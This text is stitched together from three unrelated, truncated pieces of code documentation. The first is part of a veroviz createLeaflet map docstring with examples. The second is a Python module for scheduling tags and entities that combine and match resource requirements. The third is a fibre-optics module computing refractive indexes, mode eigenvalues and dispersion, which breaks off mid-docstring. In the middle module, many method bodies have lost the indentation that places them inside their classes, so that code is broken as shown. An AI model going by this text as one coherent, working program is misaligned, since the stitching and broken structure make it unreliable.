Specifies the default zoom level. 1 --> global view; 18 --> max zoom. Note that some map tiles have maximum zoom levels less than 18. The `zoomStart` will be overridden by a `mapBoundary` (if one is provided).
nodes: :ref:`Nodes`, Conditional, `nodes`, `arcs`, and `boundingRegion` can not be None at the same time
A Nodes dataframe describing the collection of nodes to be displayed on the Leaflet map. See :ref:`Nodes` for documentation on this type of dataframe.
iconPrefix: string, Optional, default as None
Overrides the `leafletIconPrefix` column of an input :ref:`Nodes` dataframe. If provided, all nodes will use this icon prefix. Valid options are "glyphicon" or "fa". See :ref:`Leaflet Style` for details.
iconType: string, Optional, default as None
Overrides the `leafletIconType` column of an input :ref:`Nodes` dataframe. If provided, all nodes will use this icon type. The valid `iconType` options depend on the choice of `iconPrefix`. See :ref:`Leaflet Style` for the collection of valid icon prefix/type combinations.
iconColor: string, Optional, default as None
Overrides the `leafletColor` column of an input :ref:`Nodes` dataframe. If provided, all icons will use this color when displayed on this Leaflet map. See :ref:`Leaflet Style` for the list of available color options.
iconText: string, Optional, default as None
Overrides the `leafletIconText` column of an input :ref:`Nodes` dataframe. If provided, all node markers in this Leaflet map will include this text as a label (you will need to click on the marker in the map to see this label).
arcs: :ref:`Arcs` or :ref:`Assignments`, Conditional, `nodes`, `arcs` and `boundingRegion` can not be None at the same time
An :ref:`Arcs` or :ref:`Assignments` dataframe describing vehicle routes. Each row of this dataframe will be shown as a line on the Leaflet map. See the documentation on :ref:`Arcs` and :ref:`Assignments` for more information.
arcWeight: int, Optional, default as None
Overrides the `leafletWeight` column of an input :ref:`Arcs` or :ref:`Assignments` dataframe. If provided, all arcs will be displayed with this line thickness (in pixels).
arcStyle: string, Optional, default as None
Overrides the `leafletStyle` column of an input :ref:`Arcs` or :ref:`Assignments` dataframe. If provided, all arcs will be displayed with this type. Valid options are 'solid', 'dotted', or 'dashed'. See :ref:`Leaflet Style` for more information.
arcOpacity: float in [0, 1], Optional, default as None
Overrides the `leafletOpacity` column of an input :ref:`Arcs` or :ref:`Assignments` dataframe. If provided, each arc will be displayed with this opacity. Valid values are in the range from 0 (invisible) to 1 (no transparency).
arcColor: string, Optional, default as None
Overrides the `leafletColor` column of an input :ref:`Arcs` or :ref:`Assignments` dataframe. If provided, all arcs will be displayed with this color. See :ref:`Leaflet Style` for a list of available colors.
useArrows: boolean, Optional, default as None
Indicates whether arrows should be shown on all arcs on the Leaflet map.
boundingRegion: list of lists, Conditional, `nodes`, `arcs` and `boundingRegion` can not be None at the same time
A sequence of lat/lon coordinates defining a boundary polygon. The format is [[lat, lon], [lat, lon], ..., [lat, lon]].
boundingWeight: int, Optional, default as 3
Specifies the weight (in pixels) of the line defining the `boundingRegion` (if provided) when displayed in Leaflet.
boundingStyle: string, Optional, default as 'dashed'
Specifies the line style of the `boundingRegion` (if provided). Valid options are 'solid', 'dotted', 'dashed'. See :ref:`Leaflet Style` for more information.
boundingOpacity: float in [0, 1], Optional, default as 0.6
Specifies the opacity of the `boundingRegion` (if provided) when displayed in Leaflet. Valid values are in the range from 0 (invisible) to 1 (no transparency).
boundingColor: string, Optional, default as 'brown'
Specifies the line color of the `boundingRegion` (if provided) when displayed in Leaflet. See :ref:`Leaflet Style` for a list of available colors.
Return
------
Folium object
A new/updated map that displays the nodes, arcs, and/or bounding region.
Examples
--------
First, import veroviz and check the latest version
>>> import veroviz as vrv
>>> vrv.checkVersion()
Now, generate some example nodes inside a bounding region
>>> bounding = [
... [42.98355351219673, -78.90518188476564],
... [43.04731443361136, -78.83857727050783],
... [43.02221961002041, -78.7108612060547],
... [42.92777124914475, -78.68957519531251],
... [42.866402688514626, -78.75343322753908],
... [42.874957707517865, -78.82415771484375],
... [42.90111863978987, -78.86878967285158],
... [42.92224052343343, -78.8921356201172]]
>>> exampleNodes = vrv.generateNodes(
... nodeType = 'customer',
... nodeDistrib = 'normalBB',
... nodeDistribArgs = {
... 'center' : [42.90, -78.80],
... 'stdDev' : 10000,
... 'boundingRegion' : bounding
... },
... numNodes = 3,
... leafletColor = 'orange')
The first example is using all default setting for generating a set of given nodes in Nodes dataframe.
>>> vrv.createLeaflet(nodes=exampleNodes)
Define some arcs based on the nodes we just generated:
>>> exampleArcs = vrv.createArcsFromNodeSeq(
... nodes = exampleNodes,
... nodeSeq = [1, 2, 3])
>>> exampleArcs
Display the nodes, arcs, and bounding region simultaneously:
>>> vrv.createLeaflet(
... nodes = exampleNodes,
... arcs = exampleArcs,
... boundingRegion = bounding)
The createLeaflet function provides options to override styles that were defined in the input nodes and/or arcs dataframes. Note: These overrides will not change the contents in the dataframes.
>>> nodesAndArcsMap = vrv.createLeaflet(
... nodes = exampleNodes,
... iconPrefix = 'fa',
... iconType = 'car',
... iconColor = 'blue',
... arcs = exampleArcs,
... arcStyle = 'dotted')
>>> nodesAndArcsMap
If you already have a folium map object, you can add more into it.
Here, we add a bounding region to the `nodesAndArcsMap` object defined above.
>>> nodesAndArcsMap = vrv.createLeaflet(
... mapObject = nodesAndArcsMap,
... boundingRegion = bounding)
>>> nodesAndArcsMap
A new collection of nodes is defined here:
>>> newNodes = vrv.generateNodes(
... nodeType = 'customer',
... nodeDistrib = 'uniformBB',
... nodeDistribArgs = {
... 'boundingRegion' : bounding
... },
... numNodes = 4,
... leafletColor = 'red')
>>> newNodes
We will add these nodes to our existing map,
but we're overriding these new nodes with a green color:
Notice that the addition of new entities will not change the style of previous entities that were already added into the | |
from __future__ import annotations
from enum import Enum
import logging
import copy
log = logging.getLogger(__name__)
class TagType(Enum):
    """Strength of a scheduling tag.

    The integer values are meaningful: TagSetManager.score multiplies
    them pairwise to weight tag matches, so REQUIRE matches score
    highest and REJECT matches score negatively.
    """
    REQUIRE = 2
    PREFER = 1
    ACCEPT = 0
    REJECT = -1

    def __int__(self):
        # Allow int(tag_type) so scoring arithmetic can use the raw weight.
        return self.value
class Tag:
    """A named scheduling tag: a (name, value) pair plus a TagType strength."""

    def __init__(self, name, value, tag_type: Enum):
        self.name = name
        self.value = value
        self.tag_type = tag_type

    def __eq__(self, other):
        if not isinstance(other, Tag):
            # don't attempt to compare against unrelated types
            return NotImplemented
        return self.name == other.name and self.value == other.value and self.tag_type == other.tag_type

    def __hash__(self):
        # Defining __eq__ alone sets __hash__ to None, silently making Tag
        # unhashable; keep the two consistent so tags can be used in sets
        # and as dict keys.
        return hash((self.name, self.value, self.tag_type))

    def __repr__(self):
        return f"<Tag: name={self.name}, value={self.value}, type={self.tag_type}>"
class IncompatibleTagsException(Exception):
    """Raised when two tag sets cannot be combined because one set
    requires a tag that the other rejects (or vice versa)."""

    def __init__(self, first_set, second_set):
        # Both arguments are TagSetManager-like objects (they must expose
        # .filter(TagType)); the message spells out the conflicting tags.
        super().__init__(
            f"Cannot combine tag sets because require and reject tags mismatch. First tag set requires:"
            f" {[tag.value for tag in first_set.filter(TagType.REQUIRE)]} and rejects:"
            f" {[tag.value for tag in first_set.filter(TagType.REJECT)]}. Second tag set requires:"
            f" {[tag.value for tag in second_set.filter(TagType.REQUIRE)]} and rejects:"
            f" {[tag.value for tag in second_set.filter(TagType.REJECT)]}.")
class TagSetManager(object):
def __init__(self, tags=[]):
self.tags = tags or []
def add_tag_override(self, tag: Tag):
# pop the tag if it exists, as a tag can only belong to one type
self.tags = list(filter(lambda t: t.value != tag.value, self.tags))
self.tags.append(tag)
def filter(self, tag_type: TagType | list[TagType] = None,
tag_name: str = None, tag_value: str = None) -> list[Tag]:
filtered = self.tags
if tag_type:
if isinstance(tag_type, TagType):
filtered = (tag for tag in filtered if tag.tag_type == tag_type)
else:
filtered = (tag for tag in filtered if tag.tag_type in tag_type)
if tag_name:
filtered = (tag for tag in filtered if tag.name == tag_name)
if tag_value:
filtered = (tag for tag in filtered if tag.value == tag_value)
return filtered
def add_tag_overrides(self, tags: list[Tag]):
for tag in tags:
self.add_tag_override(tag)
def can_combine(self, other: TagSetManager) -> bool:
self_required = ((t.name, t.value) for t in self.filter(TagType.REQUIRE))
other_required = ((t.name, t.value) for t in other.filter(TagType.REQUIRE))
self_rejected = ((t.name, t.value) for t in self.filter(TagType.REJECT))
other_rejected = ((t.name, t.value) for t in other.filter(TagType.REJECT))
if set(self_required).intersection(set(other_rejected)):
return False
elif set(self_rejected).intersection(set(other_required)):
return False
else:
return True
def inherit(self, other) -> TagSetManager:
assert type(self) == type(other)
new_tag_set = TagSetManager()
new_tag_set.add_tag_overrides(other.filter(TagType.ACCEPT))
new_tag_set.add_tag_overrides(other.filter(TagType.PREFER))
new_tag_set.add_tag_overrides(other.filter(TagType.REQUIRE))
new_tag_set.add_tag_overrides(other.filter(TagType.REJECT))
new_tag_set.add_tag_overrides(self.filter(TagType.ACCEPT))
new_tag_set.add_tag_overrides(self.filter(TagType.PREFER))
new_tag_set.add_tag_overrides(self.filter(TagType.REQUIRE))
new_tag_set.add_tag_overrides(self.filter(TagType.REJECT))
return new_tag_set
def combine(self, other: TagSetManager) -> TagSetManager:
if not self.can_combine(other):
raise IncompatibleTagsException(self, other)
new_tag_set = TagSetManager()
# Add accept tags first, as they should be overridden by prefer, require and reject tags
new_tag_set.add_tag_overrides(other.filter(TagType.ACCEPT))
new_tag_set.add_tag_overrides(self.filter(TagType.ACCEPT))
# Next add preferred, as they should be overridden by require and reject tags
new_tag_set.add_tag_overrides(other.filter(TagType.PREFER))
new_tag_set.add_tag_overrides(self.filter(TagType.PREFER))
# Require and reject tags can be added in either order, as there's no overlap
new_tag_set.add_tag_overrides(other.filter(TagType.REQUIRE))
new_tag_set.add_tag_overrides(self.filter(TagType.REQUIRE))
new_tag_set.add_tag_overrides(other.filter(TagType.REJECT))
new_tag_set.add_tag_overrides(self.filter(TagType.REJECT))
return new_tag_set
def match(self, other: TagSetManager) -> bool:
    """Both sides' REQUIRE tags must be present in the other set, and neither
    side may contain a tag the other REJECTs."""
    for required in self.filter(TagType.REQUIRE):
        if not other.contains_tag(required):
            return False
    for required in other.filter(TagType.REQUIRE):
        if not self.contains_tag(required):
            return False
    for rejected in self.filter(TagType.REJECT):
        if other.contains_tag(rejected):
            return False
    for rejected in other.filter(TagType.REJECT):
        if self.contains_tag(rejected):
            return False
    return True
def contains_tag(self, tag) -> bool:
    """
    Returns true if the name and value of the tag match. Ignores tag_type.
    :param tag:
    :return:
    """
    candidates = self.filter(tag_name=tag.name, tag_value=tag.value)
    return any(candidates)
def score(self, other: TagSetManager) -> int:
    """
    Computes a compatibility score between tag sets.

    The score is the sum of tag_type products over tags that match on both
    name and value, minus a penalty for each of self's tags with no
    counterpart in ``other``. (Return annotation corrected: this returns an
    int, not a bool.)
    :param other:
    :return: integer compatibility score (higher is more compatible).
    """
    overlap = sum(int(tag.tag_type) * int(o.tag_type)
                  for tag in self.tags for o in other.tags
                  if tag.name == o.name and tag.value == o.value)
    # penalize tags that don't exist in the other
    penalty = sum(int(tag.tag_type) for tag in self.tags
                  if not other.contains_tag(tag))
    return overlap - penalty
def __repr__(self):
    # list(self.tags) renders identically to the original list comprehension.
    return f"{self.__class__} tags={list(self.tags)}"
@staticmethod
def from_dict(tags: dict) -> TagSetManager:
    """Build a TagSetManager from a mapping of tag-kind key -> list of values.

    Note: the parameter was annotated ``list[dict]`` but the body performs
    dict lookups (``tags.get``), so the annotation is corrected to ``dict``.

    :param tags: mapping with optional keys 'require', 'prefer', 'accept',
        'reject', each holding a list of tag values (or None).
    :return: a TagSetManager with one "scheduling" Tag per listed value.
    """
    # Insertion order preserves the original require/prefer/accept/reject order.
    kind_to_type = {
        'require': TagType.REQUIRE,
        'prefer': TagType.PREFER,
        'accept': TagType.ACCEPT,
        'reject': TagType.REJECT,
    }
    tag_list = [
        Tag(name="scheduling", value=tag_val, tag_type=tag_type)
        for key, tag_type in kind_to_type.items()
        for tag_val in tags.get(key) or []
    ]
    return TagSetManager(tags=tag_list)
class Entity(object):
def __init__(self, loader, id=None, cores=None, mem=None, gpus=None, env=None, params=None, tags=None, rank=None,
             inherits=None):
    """
    :param loader: compiles and caches the code blocks referenced below.
    :param id: entity identifier.
    :param cores: core requirement; may be a code block (compiled by validate).
    :param mem: memory requirement; may be a code block.
    :param gpus: gpu requirement; may be a code block.
    :param env: mapping of env var name -> f-string template.
    :param params: mapping of param name -> f-string template.
    :param tags: dict of tag-kind -> list of values (see TagSetManager.from_dict).
    :param rank: optional code block used to rank candidate destinations.
    :param inherits: id of the entity this one inherits from.
    """
    self.loader = loader
    self.id = id
    self.cores = cores
    self.mem = mem
    self.gpus = gpus
    self.env = env
    self.params = params
    self.tags = TagSetManager.from_dict(tags or {})
    self.rank = rank
    self.inherits = inherits
    # Eagerly compile all code blocks so errors surface at construction time
    # and the loader's compilation cache is warmed.
    self.validate()
def validate(self):
    """
    Validates each code block and makes sure the code can be compiled.
    This process also results in the compiled code being cached by the loader,
    so that future evaluations are faster.
    """
    # Resource expressions are plain code blocks.
    for code_block in (self.cores, self.mem, self.gpus):
        if code_block:
            self.loader.compile_code_block(code_block)
    # env and params entries are compiled as f-string templates.
    for mapping in (self.env, self.params):
        if mapping:
            for value in mapping.values():
                self.loader.compile_code_block(value, as_f_string=True)
    if self.rank:
        self.loader.compile_code_block(self.rank)
def __repr__(self):
    # Truncate rank to keep the repr readable; rank blocks can be long.
    rank_preview = self.rank[:10] if self.rank else ''
    return (f"{self.__class__} id={self.id}, cores={self.cores}, mem={self.mem}, gpus={self.gpus}, "
            f"env={self.env}, params={self.params}, tags={self.tags}, rank={rank_preview}, "
            f"inherits={self.inherits}")
def override(self, entity):
    """Return a shallow copy of ``entity`` with this entity's non-empty
    fields taking precedence; env and params are merged (self's keys win)."""
    new_entity = copy.copy(entity)
    new_entity.id = self.id or entity.id
    new_entity.cores = self.cores or entity.cores
    new_entity.mem = self.mem or entity.mem
    new_entity.gpus = self.gpus or entity.gpus
    # Copy the other entity's mappings first, then overlay self's entries.
    # ``copy.copy(...) or {}`` also normalizes a None/empty mapping to {}.
    new_entity.env = copy.copy(entity.env) or {}
    new_entity.env.update(self.env or {})
    new_entity.params = copy.copy(entity.params) or {}
    new_entity.params.update(self.params or {})
    # Explicit None checks so falsy-but-set values (e.g. '') still override.
    new_entity.rank = self.rank if self.rank is not None else entity.rank
    new_entity.inherits = self.inherits if self.inherits is not None else entity.inherits
    return new_entity
def inherit(self, entity):
    """Inherit from ``entity``: override its fields with self's, and merge
    tag sets with self taking precedence. With no parent, return a deep copy."""
    if not entity:
        return copy.deepcopy(self)
    merged = self.override(entity)
    merged.tags = self.tags.inherit(entity.tags)
    return merged
def combine(self, entity):
    """
    The combine operation takes an entity and combines its requirements with a second entity.
    For example, a User entity and a Tool entity can be combined to create a merged entity that contain
    both their mutual requirements, as long as they do not define mutually incompatible requirements.
    For example, if a User requires the "pulsar" tag, but the tool rejects the "pulsar" tag.
    In this case, an IncompatibleTagsException will be thrown.
    If both entities define cpu, memory and gpu requirements, the lower of those requirements are used.
    This provides a mechanism for limiting the maximum memory used by a particular Group or User.
    The general hierarchy of entities in vortex is User > Role > Tool and therefore, these entity
    are usually merged as: tool.combine(role).combine(user), to produce a final set of tool requirements.
    The combined requirements can then be matched against the destination, through the match operation.
    :param entity:
    :return:
    """
    # Start from entity's fields overridden by self's (env/params merged).
    new_entity = entity.override(self)
    # When both sides define a resource, the lower value wins (acts as a cap).
    if self.cores and entity.cores:
        new_entity.cores = min(self.cores, entity.cores)
    if self.mem and entity.mem:
        new_entity.mem = min(self.mem, entity.mem)
    if self.gpus and entity.gpus:
        new_entity.gpus = min(self.gpus, entity.gpus)
    # Composite id records which entities were combined, for diagnostics.
    new_entity.id = f"{type(self).__name__}: {self.id}, {type(entity).__name__}: {entity.id}"
    new_entity.tags = self.tags.combine(entity.tags)
    return new_entity
def matches(self, destination, context):
    """
    The match operation checks whether all of the require tags in an entity are present
    in the destination entity, and none of the reject tags in the first entity are
    present in the second entity.
    This is used to check compatibility of a final set of combined tool requirements with its destination.
    :param destination: candidate destination entity.
    :param context: currently unused here.
    :return: bool
    """
    # A destination advertising fewer cores/mem/gpus than required cannot match.
    if destination.cores and self.cores and destination.cores < self.cores:
        return False
    if destination.mem and self.mem and destination.mem < self.mem:
        return False
    if destination.gpus and self.gpus and destination.gpus < self.gpus:
        return False
    # NOTE(review): ``destination.tags or {}`` would pass a plain dict to
    # TagSetManager.match if tags were ever falsy — __init__ always builds a
    # TagSetManager, so confirm whether the fallback is reachable.
    return self.tags.match(destination.tags or {})
def evaluate_early(self, context):
    """
    Evaluate expressions in entity properties that must be evaluated early, which
    is to say, evaluated prior to combining entity requirements. These properties
    are namely, cores, mem and gpus, since at the time of combining entity requirements,
    the properties must be compared.
    :param context: evaluation context dict; mutated to expose evaluated values.
    :return: a deep copy of self with gpus/cores/mem replaced by their values.
    """
    new_entity = copy.deepcopy(self)
    # Evaluation order matters: gpus is exposed in the context before cores
    # is evaluated, and both before mem, so later expressions may refer to
    # earlier results. mem itself is only published in evaluate_late.
    if self.gpus:
        new_entity.gpus = self.loader.eval_code_block(self.gpus, context)
        context['gpus'] = new_entity.gpus
    if self.cores:
        new_entity.cores = self.loader.eval_code_block(self.cores, context)
        context['cores'] = new_entity.cores
    if self.mem:
        new_entity.mem = self.loader.eval_code_block(self.mem, context)
    return new_entity
def evaluate_late(self, context):
    """
    Evaluate expressions in entity properties that must be evaluated as late as possible, which is
    to say, after combining entity requirements. This includes env and params, that rely on
    properties such as cores, mem and gpus after they are combined.
    :param context: evaluation context dict; mutated to expose evaluated values.
    :return: a deep copy of self with env/params templates evaluated.
    """
    new_entity = copy.deepcopy(self)
    # Publish the (already combined) resource values so env/params f-string
    # templates can reference them.
    context['gpus'] = new_entity.gpus
    context['cores'] = new_entity.cores
    context['mem'] = new_entity.mem
    if self.env:
        evaluated_env = {}
        for key, entry in self.env.items():
            evaluated_env[key] = self.loader.eval_code_block(entry, context, as_f_string=True)
        new_entity.env = evaluated_env
        # Later params may refer to the evaluated env.
        context['env'] = new_entity.env
    if self.params:
        evaluated_params = {}
        for key, param in self.params.items():
            evaluated_params[key] = self.loader.eval_code_block(param, context, as_f_string=True)
        new_entity.params = evaluated_params
        context['params'] = new_entity.params
    return new_entity
def rank_destinations(self, destinations, context):
if self.rank:
log.debug(f"Ranking destinations: {destinations} for entity: {self} using custom function")
context['candidate_destinations'] = destinations
return self.loader.eval_code_block(self.rank, context)
else:
# Sort destinations by priority
log.debug(f"Ranking destinations: {destinations} for | |
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import brenth, root, brentq, bisect
from scipy.constants import c, pi
from scipy.special import jv, kv, jvp, kvp
from scipy.interpolate import interp1d
from scipy.integrate import simps
import sys
import warnings
from pprint import pprint
from math import factorial
from itertools import combinations_with_replacement, permutations
import h5py
import os
from scipy.interpolate import UnivariateSpline
from numba import jit, vectorize
import time
from six.moves import builtins
try:
    # When running under a line profiler (e.g. kernprof), ``builtins.profile``
    # is injected; this probe raises AttributeError otherwise.
    builtins.profile
except AttributeError:
    # Fallback: no-op decorator so ``@profile``-decorated code still runs.
    def profile(func):
        return func
#@jit
def jv_(n, z):
    """First derivative of the Bessel function J_n at z, via the recurrence
    J_n'(z) = (J_{n-1}(z) - J_{n+1}(z)) / 2."""
    lower = jv(n - 1, z)
    upper = jv(n + 1, z)
    return 0.5 * (lower - upper)
#@jit
def kv_(n, z):
    """First derivative of the modified Bessel function K_n at z, via the
    recurrence K_n'(z) = -(K_{n-1}(z) + K_{n+1}(z)) / 2."""
    lower = kv(n - 1, z)
    upper = kv(n + 1, z)
    return -0.5 * (lower + upper)
def save_variables_step(filename, filepath='', **variables):
    """Save keyword variables into <filepath>/<filename>.hdf5, one dataset
    per keyword name. Any existing file is overwritten.

    :param filename: file name without the .hdf5 extension.
    :param filepath: optional directory.
    :param variables: name -> array-like data to store.
    :return: None
    """
    file = os.path.join(filepath, filename + '.hdf5')
    # Open in 'w' mode so an existing file is truncated. This replaces the
    # previous ``os.system('rm ' + file)``, which was non-portable and broke
    # on paths containing spaces or shell metacharacters.
    with h5py.File(file, 'w') as f:
        for name in variables:
            f.create_dataset(str(name), data=variables[name])
    return None
class Fibre(object):
    """
    Fibre class. Set to initiate the functions needed
    for a fibre ( Seilmier equations etc).
    """

    def __init__(self):
        # Sellmeier coefficients per material: [strength B_i, resonance
        # wavelength squared in um^2] for fused silica ('sio2') and
        # Ge-doped glass ('ge'). Three resonance terms: _A_, _B_, _C_.
        self._A_ = {'sio2': [0.6965325, 0.0660932**2],
                    'ge': [0.7083925, 0.0853842**2]}
        self._B_ = {'sio2': [0.4083099, 0.1181101**2],
                    'ge': [0.4203993, 0.1024839**2]}
        self._C_ = {'sio2': [0.8968766, 9.896160**2],
                    'ge': [0.8663412, 9.896175**2]}
        return None

    def indexes(self, l, r, per, err, plot=False):
        """Compute and store core/cladding refractive indexes over ``l``.

        :param l: wavelength array (m, judging by the 1e6 scaling in sellmeier
            — TODO confirm).
        :param r: core radii; only len(r) (number of cores) is used here.
        :param per: pair of material keys (core, clad), e.g. ('ge', 'sio2').
        :param err: per-core perturbation factor(s) scaling the core-clad
            index difference — assumed small; confirm with callers.
        :param plot: when True, skip the core > clad sanity assertion.
        :return: (self.core, self.clad)
        """
        per_core, per_clad = per
        self.A = [self._A_[str(per_core)], self._A_[str(per_clad)]]
        self.B = [self._B_[str(per_core)], self._B_[str(per_clad)]]
        self.C = [self._C_[str(per_core)], self._C_[str(per_clad)]]
        core, clad = self.sellmeier(l)
        N_cores = len(r)
        try:
            # Vector case: one row per core, one column per wavelength.
            self.clad = np.repeat(clad[np.newaxis, :], N_cores, axis=0)
            # NOTE(review): time-based seed makes runs non-reproducible.
            np.random.seed(int(time.time()+10))
            self.core = np.zeros([N_cores, len(l)])
            for i in range(N_cores):
                self.core[i, :] = \
                    err[i]*(core - clad) + core
        except IndexError:
            # Fallback (presumably hit when clad is scalar): random per-core
            # perturbation instead of explicit per-core err values.
            # print('index')
            self.clad = clad
            self.core = np.random.rand(N_cores)*err*(core - clad) + core
            pass
        if not(plot):
            # print(self.core)
            # print(self.clad)
            try:
                # Guided modes require core index > cladding index everywhere.
                assert((self.core > self.clad).all())
            except AssertionError:
                # Show the offending curves before failing for real.
                print(self.core.shape)
                plt.plot(self.core, label='core')
                plt.plot(self.clad, label='clad')
                plt.show()
                assert((self.core > self.clad).all())
        return self.core, self.clad

    def sellmeier(self, l):
        """Three-term Sellmeier equation for each material in self.A/B/C.

        :param l: wavelength (m); converted to um^2 internally.
        :return: list of refractive-index arrays, one per material.
        """
        l = (l*1e6)**2
        n = []
        for a, b, c in zip(self.A, self.B, self.C):
            n.append(
                (1 + l*(a[0]/(l - a[1]) + b[0]/(l - b[1]) + c[0]/(l - c[1])))**0.5)
        return n

    def V_func(self, l_vec, a_vec):
        """Compute the V-number for every (radius, wavelength) pair and store
        it in ``self.V``. Requires ``indexes`` to have populated
        self.core/self.clad first."""
        V_vec = np.empty([len(a_vec), len(l_vec)])
        temp = (2 * pi / l_vec)
        for i, a in enumerate(a_vec):
            # V = (2*pi/lambda) * a * NA, NA = sqrt(n_core^2 - n_clad^2)
            V_vec[i, :] = temp * a * \
                (self.core[i, :]**2 - self.clad[i, :]**2)**0.5
        self.V = V_vec
        return None

    def plot_fibre_n(self, l, r, per, err):
        """Plot the core index of the last core for both material choices.
        NOTE(review): the ``per`` parameter is immediately shadowed by the
        loop variable, so the argument is effectively unused."""
        n = {}
        for per in (('ge', 'ge'), ('sio2', 'sio2')):
            nn = self.indexes(l, r, per, err, plot=True)
            n[str(per[0])] = nn[0]
        perc = (20, 30, 40, 50, 60)  # NOTE(review): unused
        fig = plt.figure()
        for p, nn in n.items():
            # print(p,nn)
            plt.plot(l*1e9, nn[-1, :], label=p)
        plt.xlabel(r'$\lambda (nm)$')
        plt.ylabel(r'$n$')
        plt.legend()
        # plt.show()
        return None

    def beta_dispersions(self, o_vec, i):
        """Taylor dispersion coefficients beta_k = k! * c_k from the fitted
        beta(omega) polynomial. ``beta_extrapo`` is defined on the ``Betas``
        subclass, so this method is only usable from there."""
        coefs = self.beta_extrapo(o_vec, i)
        betas = np.empty_like(coefs)
        # polyfit returns highest order first; reverse so index == order k.
        for i, c in enumerate(coefs[::-1]):
            betas[i] = c * factorial(i)
        return betas
# Numba-vectorized residual of the fibre dispersion (eigenvalue) relation:
# (a + b)(a + b*r^2) - n^2 (1/u^2 + 1/w^2)(1/u^2 + r^2/w^2),
# where a, b are the J/K Bessel-term ratios computed in Eigenvalues.eq,
# r = n_clad/n_core, u and w are the modal eigenvalue guesses, and n is the
# azimuthal mode order. Roots of this residual are the guided modes.
@vectorize('float64(float64,float64,float64,float64,float64,float64)')
def res_faster(a, b, r, u, w, n):
    return (a + b) * (a + b*r**2) \
        - n**2 * (1/u**2 + 1/w**2) * (1/u**2 + r**2 / w**2)
class Eigenvalues(Fibre):
    """
    Sets up to solve and solves the eigenvalue equation
    to find the eigenvalues of HE11. Only works on a single mode
    fibre. Inherits V number function from Fibre class.
    """

    def __init__(self, l, r, ncore, nclad):
        # Index grids (rows: radii, cols: wavelengths), precomputed elsewhere.
        self.core, self.clad = ncore, nclad
        self.V_func(l, r)  # fills self.V
        self.a_vec = r
        self.l_vec = l
        # NOTE(review): named k but 2*pi*c/l is the angular frequency, not
        # the wavenumber 2*pi/l — confirm intended use.
        self.k = 2 * pi * c / l
        self.ratio = self.clad/self.core
        return None

    #@profile
    def w_f(self, u, i, j):
        """
        Equation to get w eigenvalue with respect to guess u, and V.
        (From the constraint u^2 + w^2 = V^2.)
        """
        return (self.V[i, j]**2 - u**2)**0.5

    #@profile
    def eq(self, u_vec, i, j, n=1):
        """
        The eigenvalue equation of a single mdoe fibre,
        set by default to find the HE11 mode.
        Returns the residual of the dispersion relation at each u in u_vec.
        """
        u = u_vec
        #@vectorize('float64(float64,float64,float64)')
        w = self.w_f(u, i, j)
        # Bessel-term ratios fed into the vectorized residual.
        a = jv_(n, u)/(u*jv(n, u))
        b = kv_(n, w)/(w*kv(n, w))
        res = res_faster(a, b, self.ratio[i, j], u, w, n)
        return res

    def neff(self, i, j, u, w):
        """
        Calculates the neff of each mode for sorting so the fundemental mode can be found.
        """
        return (((self.core[i, j]/u)**2 + (self.clad[i, j]/w)**2)
                / (1/u**2 + 1/w**2))**0.5

    def eigen_solver(self, margin, i, j):
        """
        Finds the eigenvalues of the fibre using breth.
        Inputs:
          margin: A safety margin to save from the Zero division errors
                  that arrise from the Eigenvalue equation if u,w = 0
        Returns:
          u, w: eigenvalues of the equation, system exists if non are
                found and the equation is plotted.
        """
        converged = False  # NOTE(review): unused
        m = margin         # NOTE(review): unused
        V_d = []           # NOTE(review): unused
        nm = -1
        s = []
        count = 8
        N_points = 2**count
        found_all = 0
        # Double the sampling density until two consecutive passes bracket
        # the same number of sign changes, i.e. all roots are located.
        while found_all < 2:
            nm = len(s)
            u_vec = np.linspace(margin, self.V[i, j] - margin, N_points)
            eq = self.eq(u_vec, i, j, n=1)
            # Indices where the residual changes sign (root brackets).
            s = np.where(np.sign(eq[:-1]) != np.sign(eq[1:]))[0] + 1
            count += 1
            N_points = 2**count
            if nm == len(s):
                found_all += 1
        # Refine each bracketed root with Brent's method.
        u_sol, w_sol = np.zeros(len(s)), np.zeros(len(s))
        for iss, ss in enumerate(s):
            Rr = brenth(self.eq, u_vec[ss-1], u_vec[ss],
                        args=(i, j), full_output=True)
            u_sol[iss] = Rr[0]
            w_sol[iss] = self.w_f(Rr[0], i, j)
        if len(s) != 0:
            # Pick the fundamental mode: the root with the highest n_eff.
            neffs = self.neff(i, j, u_sol, w_sol)
            neffs = np.nan_to_num(neffs)
            indx_fun = np.argmax(neffs)
            #print(len(s), self.V[i,j], neffs[indx_fun])
            #print(u_sol[indx_fun],w_sol[indx_fun], self.V[i,j])
            # if len(s) >1:
            #    #print(s)
            #    plt.plot(u_vec, eq)
            #    plt.axhline(0, color='black')
            #    plt.title(str(1e9*self.l_vec[j]).format('%3') + ', ' +str(self.a_vec[i]).format('%3'))
            #    plt.ylim(-1,1)
            #    plt.show()
            return u_sol[indx_fun], w_sol[indx_fun]
        else:
            # No roots found: report the offending parameters, plot the
            # residual for inspection, and abort the run.
            print(
                '----------------------------No solutions found for some inputs--------------------')
            print(' V = ', self.V[i, j])
            print(' R = ', self.a_vec[i])
            print(' l = ', self.l_vec[j])
            print(
                '----------------------------------------------------------------------------------')
            u = np.linspace(1e-6, self.V[i, j] - 1e-6, 2048)
            print(self.V)
            e = self.eq(u, i, j)
            plt.plot(np.abs(u), e)
            plt.xlim(u.min(), u.max())
            plt.ylim(-10, 10)
            plt.show()
            sys.exit(1)
class Betas(Fibre):
    """
    Calculates the betas of the fibre mode.
    """

    def __init__(self, u_vec, w_vec, l_vec, o_vec, o, ncore, nclad):
        #self.k = 2*pi/(l_vec)
        self.u = u_vec                     # modal eigenvalues u (rows: cores)
        self.w = w_vec                     # modal eigenvalues w
        self.core, self.clad = ncore, nclad
        self.o_vec = o_vec                 # frequency grid (scaled by 1e12 in beta_func)
        self.o = o                         # expansion (carrier) frequency
        self.o_norm = self.o_vec - self.o  # detuning used as the fit abscissa
        return None

    def beta_func(self, o_vec, i):
        """
        Calculates and returns the betas of the fibre
        (beta = (omega/c) * n_eff, with n_eff built from u, w and the
        core/clad indexes; the 1e12 factor suggests o_vec is supplied in
        THz-scaled units — TODO confirm against callers).
        """
        return ((o_vec*1e12/c)**2*((self.core[i, :]/self.u[i, :])**2 +
                (self.clad[i, :]/self.w[i, :])**2)/(1/self.u[i, :]**2
                + 1/self.w[i, :]**2))**0.5
        # return (((self.core[i, j]/u)**2 + (self.clad[i, j]/w)**2)
        #    / (1/u**2 + 1/w**2))**0.5

    def beta_extrapo(self, o_vec, i):
        """
        Gets the polyonomial coefficiencts of beta(omega) with the
